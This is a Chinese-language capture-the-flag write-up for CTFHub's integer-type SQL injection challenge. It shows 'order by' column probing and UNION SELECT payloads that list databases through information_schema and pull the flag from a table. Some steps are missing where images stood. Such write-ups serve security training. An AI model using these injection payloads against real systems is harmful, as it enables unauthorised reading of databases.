天天看點

CTFHUB-SQL注入-整數型注入整數型注入

整數型注入

考點 SQL注入-整數型注入

分析過程

輸入 1試試

CTFHUB-SQL注入-整數型注入整數型注入

得到回顯結果如上

由于已知是整數型 是以直接判斷列數

playload:

?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3
           
CTFHUB-SQL注入-整數型注入整數型注入
CTFHUB-SQL注入-整數型注入整數型注入

到3時無回顯由此得出其有兩列

然後查詢庫名

playload:

CTFHUB-SQL注入-整數型注入整數型注入

得到庫名 此時可以爆出所有的資料庫名

playload:

?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
           
CTFHUB-SQL注入-整數型注入整數型注入

根據庫名爆表名

playload:

CTFHUB-SQL注入-整數型注入整數型注入

然後去爆flag的字段

playload:

CTFHUB-SQL注入-整數型注入整數型注入

爆出字段可以直接查詢資料

playload:

?id=-1 union select 1,group_concat(flag) from sqli.flag
           
CTFHUB-SQL注入-整數型注入整數型注入

屬于是得到flag